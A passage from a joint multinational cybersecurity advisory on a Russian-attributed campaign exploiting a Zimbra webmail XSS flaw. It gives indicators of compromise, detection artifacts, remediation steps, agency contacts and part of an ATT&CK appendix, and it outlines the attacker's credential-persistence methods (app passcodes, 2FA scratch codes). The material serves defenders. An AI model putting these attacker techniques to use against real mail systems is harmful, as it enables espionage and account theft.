<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>27 Sep 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.mailnalysis[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>cddf5c3be1e07f28140aed165b929bf2d614922a </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>12 Nov 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>17 Dec 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.zimbrastat[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>18b3ad442ce73cc8656d51d75bbd7c855f2cb7e8 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>18 Dec 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>28 Dec 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.zimbrasoft.com[.]ua </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>1b25041ececf2457eef0270fc1d785cec8ec9ded </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>21 Jan 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>10 Feb 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.synacorzimbra[.]nl </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>e4fe6466a4f9a4249fe330651e914e45bbdca44a </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>5 Feb 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>22 Mar 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.istc-cloud[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>b6b77c9a455225d525834a403ca9ef5481ed0447 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>12 Feb 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>30 Mar 2026 </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>LAUNDRY BEAR has used the following email addresses to procure resources used for this campaign:</p>
<ul>
<li>ivanka.zurabishvili@proton[.]me,</li>
<li>zmul1@buildandconsulting[.]com,</li>
<li>garrysmithme@pinmx[.]net, and</li>
<li>hostingclient@pinmx[.]net.</li>
</ul>
<h4><strong>Phishing distribution</strong></h4>
<p>LAUNDRY BEAR primarily relied on ProtonMail for distribution of malicious email. However, as stated above, LAUNDRY BEAR’s more recent efforts likely have shifted to distributing the payload through previous victims.  </p>
<p>The following email addresses have distributed payloads attributed to this campaign:</p>
<ul>
<li>c.laurent.ejfa@proton[.]me,</li>
<li>j.moreau.epsc@proton[.]me,</li>
<li>liberty.insights@proton[.]me,</li>
<li>certain email addresses (presumably compromised) at the isofts.kiev[.]ua domain (i.e., ending with @isofts.kiev[.]ua), and</li>
<li>certain email addresses (presumably compromised) at the navs.edu[.]ua domain (i.e., ending with @navs.edu[.]ua).</li>
</ul>
<p>Additionally, the following are SHA-256 hashes of email samples containing the malicious payload attributed to this campaign:</p>
<ul>
<li>98df604ecc57f884a2e6ce3266a0013ad64455cac48442c2312cfa4765007aaf,</li>
<li>60db9abae75cd8ccc49dd7ea5feb41677566dcd442f12ebc5745ffd2810fb874,</li>
<li>b1f5beb1175fc5c7d1806a2f0d900eb124c54f0286c5c52b66eea7a6633adb1d, and</li>
<li>1517b3caa495f6c4e832df9c75fc94667e3c233773f7fa4e056d5e30e5ead760.</li>
</ul>
<h4><strong>Post-compromise artifacts</strong></h4>
<p>Currently, the script does not remove artifacts. This leaves additional opportunities to identify victims of this activity. While emphasis should always be placed on consistent monitoring of network traffic and endpoint activity, there are a variety of persistent artifacts described below that can be used to identify victims of this campaign.</p>
<p>This <em>Ulej </em>capability relies on creating a significant number of SOAP requests to collect account information for exfiltration. ZCS logs from these requests are stored, by default, in the <em>/opt/zimbra/log/mailbox.log</em> file [<a href="https://d3fend.mitre.org/technique/d3f:ProcessAnalysis" target="_blank">D3-PA</a>]. A significant amount of SOAP request activity that aligns with what was described in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> and <a href="https://www.cisa.gov/#collection1">Collection</a> sections of this advisory could indicate a potential compromise. Specific examples of high-risk SOAP request activity might include:</p>
<ul>
<li>Many <em>SearchGalRequest </em>command requests from a single user over a short period of time;</li>
<li>Use of the <em>CreateAppSpecificPasswordRequest</em> command, especially in cases where it is creating an Application Passcode named “ZimbraWeb”; and</li>
<li>Use of the GetScratchCodesRequest command.</li>
</ul>
<p>While LAUNDRY BEAR uses the localStorage property to track what days had emails previously exfiltrated, defenders can use this property to identify victims of this campaign and determine the scope of exfiltrated information [<a href="https://d3fend.mitre.org/technique/d3f:ProcessAnalysis" target="_blank">D3-PA</a>]. Review of the items stored in that property for an organization’s ZCS webmail client page on an endpoint device could indicate compromise if there are items named with a format of <em>zd_comp_YYYY-MM-DD,</em> as explained in the <a href="https://www.cisa.gov/#collection1">Collection</a> section of this advisory.</p>
<p>While Application Passcodes have non-malicious purposes, in this case instances of these passcodes with the name “ZimbraWeb” are almost certainly malicious. The ZCS webmail application can support 2FA natively and does not require the use of an Application Passcode, so there is no reason that there should be one named “ZimbraWeb.”</p>
<p>In instances where organizations identify victims of this campaign, they should also examine the inbox of the suspected victim for the original phishing email [<a href="https://d3fend.mitre.org/technique/d3f:MessageAnalysis" target="_blank">D3-MA</a>]. If an email that has a payload exploiting <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376">CVE-2025-66376</a> is discovered, <strong>steps should be taken immediately to identify and quarantine other instances of emails with similar body content, senders, and subject lines to prevent further exploitation and exfiltration.  </strong></p>
<h3><em><strong>Remediation</strong></em></h3>
<p>In the event an organization identifies activity associated with this campaign, that organization should take steps to minimize further exploitation. The organization should consider requesting that employees minimize use of the ZCS webmail client until the organization updates to a patched version that is not vulnerable to <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a>.</p>
<p>Organizations should use identifiers from the <a href="https://www.cisa.gov/#ioc1">IOCs</a> section of this report to identify any individuals compromised by this campaign and record the date(s) of compromise(s) to determine the scale and scope of emails exfiltrated.</p>
<p>All users from the organization should have all Application Passcodes and 2FA scratch keys revoked. Affected organizations should require all employees to change passwords in line with establishing minimum password strength requirements [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#EstablishMinimumPasswordStrength3B">CPG 3.B</a>] and creating unique credentials [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#CreateUniqueCredentials3C">CPG 3.C</a>], specifically noting that compromised employees might have had any password stored in a password manager exfiltrated.</p>
<h2><strong>Works cited</strong></h2>
<p>[1<a class="ck-anchor"></a>] Netherlands General Intelligence and Security Service (AIVD) and Netherlands Defence Intelligence and Security Service (MIVD). AIVD and MIVD identify a new Russian cyber threat actor. 2025. <a href="https://www.aivd.nl/site/binaries/site-content/collections/documents/2025/05/27/aivd-en-mivd-onderkennen-nieuwe-russische-cyberactor/Advisory+AIVD+en+MIVD+Public+report+on+new+cyber+actor.pdf" target="_blank">https://www.aivd.nl/site/binaries/site-content/collections/documents/2025/05/27/aivd-en-mivd-onderkennen-nieuwe-russische-cyberactor/Advisory+AIVD+en+MIVD+Public+report+on+new+cyber+actor.pdf</a></p>
<p>[2]<a class="ck-anchor"></a> Microsoft Corporation. New Russia-affiliated actor Void Blizzard targets critical sectors for espionage. 2025. <a href="https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/" target="_blank">https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/</a></p>
<p>[3]<a class="ck-anchor"></a> Palo Alto Networks Unit 42. Russian Global Webmail Espionage. 2026. <a href="https://unit42.paloaltonetworks.com/russian-webmail-espionage/">https://unit42.paloaltonetworks.com/russian-webmail-espionage/ </a></p>
<p>[4]<a class="ck-anchor"></a> Proofpoint. TA488 Targets Zimbra Mailservers with Half-Click Exploits. 2026. <a href="https://www.proofpoint.com/us/blog/threat-insight/ta488-zcs-exploit">https://www.proofpoint.com/us/blog/threat-insight/ta488-zcs-exploit</a></p>
<p>[5]<a class="ck-anchor"></a> Seqrite. Operation GhostMail: Russian APT exploits Zimbra Webmail to Target Ukraine State Agency. 2026. <a href="https://www.seqrite.com/blog/operation-ghostmail-zimbra-xss-russian-apt-ukraine/" target="_blank">https://www.seqrite.com/blog/operation-ghostmail-zimbra-xss-russian-apt-ukraine/  </a></p>
<h2><strong>Footnotes</strong></h2>
<p><sup>1</sup><a class="ck-anchor"></a> Národní úřad pro kybernetickou a informační bezpečnost<br><sup>2</sup><a class="ck-anchor"></a><sup> </sup>Forsvarets Efterretningstjeneste<br><sup>3</sup><a class="ck-anchor"></a><sup> </sup>Välisluureamet<br><sup>4</sup><a class="ck-anchor"></a> Sotilastiedustelu<br><sup>5</sup><a class="ck-anchor"></a><sup> </sup> Suojelupoliisi<br><sup>6</sup><a class="ck-anchor"></a> Direction générale de la sécurité intérieure<br><sup>7</sup><a class="ck-anchor"></a> Agence nationale de la sécurité des systèmes d’information<br><sup>8</sup><a class="ck-anchor"></a> Agenzia Informazioni e Sicurezza Esterna<br><sup>9</sup><a class="ck-anchor"></a> Agenzia Informazioni e Sicurezza Interna<br><sup>10</sup><a class="ck-anchor"></a> Serviciul de Informații și Securitate al Republicii Moldova<br><sup>11 </sup><a class="ck-anchor"></a>Agencja Wywiadu<br><sup>12</sup><a class="ck-anchor"></a><sup> </sup>Służba Kontrwywiadu Wojskowego<br><sup>13</sup><a class="ck-anchor"></a><sup> </sup>Centro Nacional de Inteligencia<br><sup>14 </sup><a class="ck-anchor"></a>Nationellt Cybersäkerhetscenter<br><sup>15</sup><a class="ck-anchor"></a> MITRE and ATT&amp;CK are registered trademarks of The MITRE Corporation. MITRE D3FEND is a trademark of The MITRE Corporation.</p>
<h2><strong>Acknowledgements</strong></h2>
<p>The authoring agencies acknowledge the contributions to this advisory from Palo Alto Networks Unit 42 and Proofpoint.</p>
<h2><strong>Disclaimer of endorsement</strong></h2>
<p>The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.</p>
<p>Organizations have no obligation to respond or provide information back to the authoring organizations in response to this joint advisory. If, after reviewing the information provided, an organization decides to provide information to the authoring organizations, reporting must be consistent with all applicable laws and policies.</p>
<h2><strong>Purpose</strong></h2>
<p>This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.</p>
<h2><strong>Contact</strong></h2>
<div class="SCXW95230887 BCX8">
<div class="OutlineElement Ltr SCXW95230887 BCX8">
<p><strong>United States organizations </strong></p>
<ul>
<li><strong>National Security Agency</strong> <br>Cybersecurity Report Feedback: <a href="mailto:CybersecurityReports@nsa.gov" target="_blank"><u>CybersecurityReports@nsa.gov</u></a> <br>Defense Industrial Base Inquiries and Cybersecurity Services: <a href="mailto:DIB_Defense@cyber.nsa.gov" target="_blank"><u>DIB_Defense@cyber.nsa.gov</u></a> <br>Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721, <a href="mailto:MediaRelations@nsa.gov" target="_blank"><u>MediaRelations@nsa.gov</u></a> </li>
<li><strong>Cybersecurity and Infrastructure Security Agency</strong> <br>CISA’s 24/7 Operations Center (<a href="mailto:contact@cisa.dhs.gov" target="_blank"><u>contact@cisa.dhs.gov</u></a>), or by calling 1-844-Say-CISA (1-844-729-2472). </li>
<li><strong>Federal Bureau of Investigation</strong> <br>If you or someone you know has fallen victim to this campaign, file a complaint with <a class="Hyperlink SCXW95230887 BCX8" href="https://www.ic3.gov/" target="_blank" rel="noreferrer noopener"><u>IC3</u></a>. </li>
<li><strong>Defense Counterintelligence and Security Agency </strong> <br>DCSA Counterintelligence, Cyber Mission Center, Cyber Threat Operations Branch: <a href="mailto:DCSA.CI.CyberOps@mail.mil" target="_blank"><u>DCSA.CI.CyberOps@mail.mil</u></a> <br>Cleared Contactors (CCs) should contact their DCSA Counterintelligence Special Agent to report information pertaining to suspicious contacts or physical/digital efforts to obtain illegal or unauthorized access to the CC’s cleared facility/information, as required by 32 CFR 117. <br>Media/Public Inquiries: <a href="mailto:dcsa.quantico.dcsa-hq.mbx.pa@mail.mil" target="_blank"><u>dcsa.quantico.dcsa-hq.mbx.pa@mail.mil</u></a>  </li>
<li><strong>Department of Defense Cyber Crime Center </strong> <br>Defense Industrial Base Inquiries and Cybersecurity Services: <a href="mailto:DC3.DCISE@us.af.mil" target="_blank"><u>DC3.DCISE@us.af.mil</u></a> <br>Defense Industrial Base mandatory cyber incident reporting as required by 10 U.S. Code Sections 391 and 393 and Defense Federal Acquisition Regulation Supplement (DFARS) 252.204-7012 is submitted at <a href="https://dibnet.dod.mil/" target="_blank"><u>https://dibnet.dod.mil</u></a> <br>Media Inquiries / Press Desk: <a href="mailto:DC3.Information@us.af.mil" target="_blank"><u>DC3.Information@us.af.mil</u></a> </li>
<li><strong>Naval Criminal Investigative Service</strong> <br>To report criminal activity impacting the United States Navy, go to <a href="http://www.ncis.navy.mil/" target="_blank"><u>www.ncis.navy.mil</u></a> and click “Submit a Tip”</li>
</ul>
<p><strong>Dutch organizations</strong> </p>
<ul>
<li>Defence Intelligence and Security Service (MIVD): <a href="https://www.defensie.nl/onderwerpen/m/militaire-inlichtingen-en-veiligheid" target="_blank"><u>https://www.defensie.nl/onderwerpen/m/militaire-inlichtingen-en-veiligheid</u></a>  </li>
<li>General Intelligence and Security Service (AIVD): <a href="https://www.aivd.nl/" target="_blank"><u>https://www.aivd.nl</u></a> </li>
</ul>
<p><strong>Australian organizations </strong></p>
<ul>
<li>Australian Signals Directorate <br>Visit <a href="https://www.cyber.gov.au/about-us/about-asd-acsc/contact-us#no-back" target="_blank"><u>cyber.gov.au</u></a> or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories. </li>
</ul>
<p><strong>Canadian organizations </strong></p>
<ul>
<li>The Canadian Centre for Cyber Security (Cyber Centre), part of the Communications Security Establishment, encourages Canadian organizations to report cyber incidents and to strengthen the security of their networking devices.  <br>Report an incident or suspicious activity to the Cyber Centre by email at <a href="mailto:contact@cyber.gc.ca" target="_blank"><u>contact@cyber.gc.ca</u></a>, online via the reporting tool <a href="https://www.cyber.gc.ca/en/incident-management" target="_blank"><u>Report a cyber incident - Canadian Centre for Cyber Security</u></a> or by phone at 1-833-CYBER-88 (1-833-292-3788). </li>
</ul>
<p><strong>New Zealand organizations </strong></p>
<ul>
<li>New Zealand National Cyber Security Centre (NCSC-NZ): <a href="mailto:info@ncsc.govt.nz" target="_blank"><u>info@ncsc.govt.nz</u></a> </li>
</ul>
<p><strong>United Kingdom organizations </strong></p>
<ul>
<li>Report significant cyber security incidents to <a href="https://ncsc.gov.uk/report-an-incident" target="_blank"><u>ncsc.gov.uk/report-an-incident</u></a> (monitored 24/7) </li>
</ul>
<p><strong>Estonia organizations </strong></p>
<ul>
<li>Estonian Foreign Intelligence Service (EFIS): <a href="mailto:info@valisluureamet.ee" target="_blank"><u>info@valisluureamet.ee</u></a> </li>
</ul>
<p><strong>Finnish organizations </strong></p>
<ul>
<li>Finnish Security and Intelligence Service: <a href="https://supo.fi/en/contact" target="_blank"><u>supo.fi/en/contact</u></a> </li>
</ul>
<p><strong>French organizations </strong></p>
<ul>
<li>French organizations are encouraged to report suspicious activity or incident related information found in this advisory by contacting ANSSI/CERT-FR at: <a href="mailto:cert-fr@ssi.gouv.fr" target="_blank"><u>cert-fr@ssi.gouv.fr</u></a> or by phone at: 3218 or +33 9 70 83 32 18. </li>
</ul>
<p><strong>Italian Organizations </strong></p>
<ul>
<li>Italian External Intelligence and Security Agency (AISE):  <br>Visit <a href="https://www.sicurezzanazionale.gov.it/" target="_blank"><u>https://www.sicurezzanazionale.gov.it/</u></a>  </li>
<li>Italian Internal Intelligence and Security Agency (AISI):  <br>Visit <a href="https://www.sicurezzanazionale.gov.it/" target="_blank"><u>https://www.sicurezzanazionale.gov.it/</u></a> </li>
</ul>
<div class="OutlineElement Ltr SCXW214395380 BCX8">
<p><strong>Moldovan organizations </strong></p>
</div>
<div class="ListContainerWrapper SCXW214395380 BCX8">
<ul type="disc">
<li>Security and Intelligence Service of the Republic of Moldova (SIS RM): <a href="mailto:cybersec@sis.md" target="_blank"><u>cybersec@sis.md</u></a> </li>
</ul>
</div>
<p><strong>Polish organizations </strong></p>
<ul>
<li>Polish Foreign Intelligence Agency (AW): <a href="mailto:ctiteam@aw.gov.pl" target="_blank"><u>ctiteam@aw.gov.pl</u></a></li>
</ul>
</div>
</div>
<h2><strong>Appendix A: MITRE ATT&amp;CK tactics and techniques</strong><a class="ck-anchor"></a></h2>
<p>See <a href="https://www.cisa.gov/#table9"><strong>Table 9</strong></a> through <a href="https://www.cisa.gov/#table19"><strong>Table 19</strong></a> for all the threat actor tactics and techniques referenced in this advisory.<a class="ck-anchor"></a></p>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 9: Reconnaissance </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Gather Victim Identity Information: Credentials </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1589/001/" target="_blank"><u>T1589.001</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The payload attempts to intercept a victim’s password from their password manager. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Gather Victim Identity Information: Email Addresses </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1589/002/" target="_blank"><u>T1589.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The payload attempts to grab the victim’s email address from various data stores. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Search Open Websites/Domains </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1593/" target="_blank"><u>T1593</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This group likely leverages public information to support target development. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Active Scanning </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1595/" target="_blank"><u>T1595</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Port scanning can be used by this group to assist with determining exploitability of identified targets. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Search Open Technical Databases: Scan Databases </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1596/005/" target="_blank"><u>T1596.005</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Various public datasets can provide information to support discovery of exploitable targets. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Search Closed Sources </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1597/" target="_blank"><u>T1597</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Previously exfiltrated data can be used to enhance target development efforts. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Search Closed Sources: Purchase Technical Data </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1597/002/" target="_blank"><u>T1597.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Commercial datasets can also be used to support target development efforts. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<div class="WACAltTextDescribedBy SCXW76044448 BCX8"><a class="ck-anchor"></a></div>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 10: Resource Development </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Acquire Infrastructure </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1583/" target="_blank"><u>T1583</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This group used Mullvad VPN to anonymize traffic sent to operational infrastructure. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Acquire Infrastructure: Virtual Private Server </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1583/003/" target="_blank"><u>T1583.003</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This group procured VPS servers from a variety of vendors. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Develop Capabilities </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1587/" target="_blank"><u>T1587</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The <em>Ulej</em> capability was developed likely for use by this group to conduct spear phishing campaigns. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Develop Capabilities: Malware </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1587/001/" target="_blank"><u>T1587.001</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Development of a novel payload that steals a victim’s emails and other sensitive account information. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Develop Capabilities: Exploits </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1587/004/" target="_blank"><u>T1587.004</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Development of a novel, at the time, cross-site-scripting (XSS) exploit that enables execution of arbitrary JavaScript. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obtain Capabilities: Tool </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1588/002/" target="_blank"><u>T1588.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Open source tools, such as Evilginx2, have also been used by the group. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obtain Capabilities: Artificial Intelligence </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
